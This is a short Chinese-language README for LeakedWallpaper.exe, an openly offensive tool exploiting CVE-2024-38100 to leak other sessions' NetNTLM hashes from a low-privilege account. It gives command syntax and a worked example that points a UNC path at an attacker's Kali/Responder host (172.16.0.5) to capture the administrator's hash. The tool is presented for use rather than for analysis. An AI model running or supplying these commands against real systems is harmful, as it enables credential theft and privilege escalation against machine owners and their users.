这是一个权限提升工具(已在 KB5040434 中通过 CVE-2024-38100 修复),它允许我们从计算机上的任何会话中泄露用户的 NetNTLM 哈希,即使我们是以低权限用户身份运行。
.\LeakedWallpaper.exe <session> \\<KALI IP>\c$\1.jpg [-downgrade]
# 示例
.\LeakedWallpaper.exe 1 \\172.16.0.5\c$\1.jpg -downgrade
如果被阻止,请查看 demo.mkv
假设主机上有两个会话:
当前会话 id: 2
目标会话 id: 1

Responder IP: 172.16.0.5
Windows IP: 172.16.0.2

让我们用该工具获取 administrator 的 NetNTLM 哈希!
.\LeakedWallpaper 1 \\172.16.0.5\c$\1.jpg
成功!
